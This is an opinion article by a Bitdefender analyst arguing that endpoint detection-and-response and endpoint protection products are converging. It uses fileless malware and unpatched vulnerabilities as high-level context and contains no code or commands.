The ever-changing security landscape, which revolves around advanced and sophisticated threats aimed at data exfiltration and cyber espionage, has spawned a new breed of technologies. They are focused more on detection and response (EDR) rather than antimalware and anti-spyware capabilities, which are addressed by endpoint protection platforms (EPP). The combination of these technologies will set a new standard for security, providing an approach based on the most used and trusted solutions today.
Consequently, security companies have begun incorporating data protection and device management features into legacy EPP solutions, which in 2015 was an estimated $3.2 billion market. This change is an attempt to expand capabilities and tap into a new market that has typically been segregated from traditional security. Conversely, EDR vendors have begun integrating endpoint protection technologies to keep up with the new functionalities added by EPP vendors. The endpoint security continuum is focused on consolidating layered security in order to apply in-depth defence technologies meant to increase the overall security posture of the organisation. In turn, this integration will benefit companies in terms of not just security capabilities, but also in terms of visibility across hyperconverged infrastructures with both physical and virtual endpoints.
Traditional file-based malware – while still common – may not be a company’s main concern. Signatures and heuristics that use pattern matching to correctly flag malicious files are questioned by companies, as new fileless malware gains traction.
Traditional malware requires a file containing the malicious code to be downloaded to a disk and then executed. Fileless malware runs in memory, leaving no artifacts on the local hard drive. Advanced and sophisticated threats built for cyberespionage or data exfiltration started leveraging this technique as traditional EPP solutions don’t have memory introspection abilities for live memory analysis.
These memory-based attacks leverage tools already installed, usually by default, like PowerShell, Windows Management Instrumentation. This prevents alarms being raised by legacy EPP solutions. Some fileless attacks go as far as to use registries for recompiling and executing in-memory malicious binaries, making the attacks persistent even after reboots and remaining undetected to traditional EPPs.
While some malware deployment techniques involve leveraging zero-day vulnerabilities into commonly deployed applications such as Adobe Flash, browsers, and Java, both file-based and fileless malware usually exploit known vulnerabilities that have not been patched, or use spear phishing emails with infected attachments. Recent events involving the WannaCry and GoldenEye ransomware outbreaks have proven that known vulnerabilities can still be successfully leveraged, as not all companies deploy security patches and updates in a timely manner. Either because of legacy or backwards compatibility issues, organisations may be left open to advanced malware that exploits unpatched systems and services.
The current reality of endpoint security
Many organisations that run hybrid infrastructures or software defined data centres (SDDC) are faced with the impossible task of balancing various permutations of anti-virus solutions in conjunction with EPP solutions and anti-exploit technologies. While this is a valiant effort to address all attack vectors, deploying individual technologies from various vendors often means running multiple security agents, impacting performance, and having multiple consoles, effecting management efficiency.
While the total cost of ownership might be lower on paper, the reality is that performance and costs usually make these implementations cumbersome, creating more problems for IT managers than they solve.
The intricacies of malware intrusions cannot be resolved by deploying disparate EDR and EPP solutions together, as that will only cause performance and management issues. The likely results will be: one, EDR and EPP markets will bifurcate including light and heavy deployments of technologies; or two, they will converge into a NextGen EPP, offering hardening and control, pre-execution detection, post-execution detection, automated response, and visibility all under a single unified agent.
EDR and EPP fragmentation will likely cause the evolution of a new NextGen EPP solution that can predict, prevent, detect, and respond to advanced malware. This, combined with NextGen security tools, will enable enterprises of all sizes to safeguard the entire attack vector spectrum. With locally deployed machine learning algorithms for detecting hacking tools, suspicious files, and advanced threats, NextGen EPP solutions also support sandboxing and security analytics that can help security administrators understand the chain of events that look suspicious, while having the necessary contextual information to trace the root cause of advanced attacks before a breach occurs.
While sandboxing is sometimes proposed as an individual offering, NextGen EPPs will include it as an advanced security control capable of detonating suspicious files and performing in-depth dynamic analysis of behaviour to vet them before compromising the machine. This is particularly useful as even fileless malware based on PowerShell scripts can be detonated and analysed before being executed locally.
Fortifying the security posture of an organisation will become a lot easier as visibility into stealth attacks, abnormal system and application behaviour will be centralised into a single management console, offering single-pane-of-glass visibility into the overall security status of the entire infrastructure.
Hyper detection capabilities stemming from advanced threat detection and performance coupled with threat intelligence and actionable indicators of compromise will enable IT administrators to not only reduce the complexity and cost of operations, but also effectively defend themselves against advanced threats.
With threat forensics and aggressive detection capabilities converging with EDR and traditional EPP technologies, NextGen endpoint platforms will be uniquely suited to augment an organisation’s security posture without sacrificing performance or off-balancing security budgets.
What makes NextGen endpoint platforms unique is their ability to focus on detection and remediation without sacrificing prevention, something that EDR and EPP solutions cannot accomplish alone. The convergence of these capabilities will not only offer added value for organisations, but will also change the way we look at security.
With a single implementation that has all the necessary tools to prevent malware from affecting endpoints, organisations will also have the security control that allows for application monitoring, as well as the detection and response capabilities necessary for finding and removing advanced threats. Countering the dynamic and diverse capabilities of cybercriminals will become a lot easier with converged endpoint security solutions and protecting corporate assets will become a seamless experience thanks, in part, to unified management console that offer single-pane-of-glass visibility across hybrid infrastructures.
Liviu Arsene, senior e-threat analyst, Bitdefender
Image Credit: ESB Professional / Shutterstock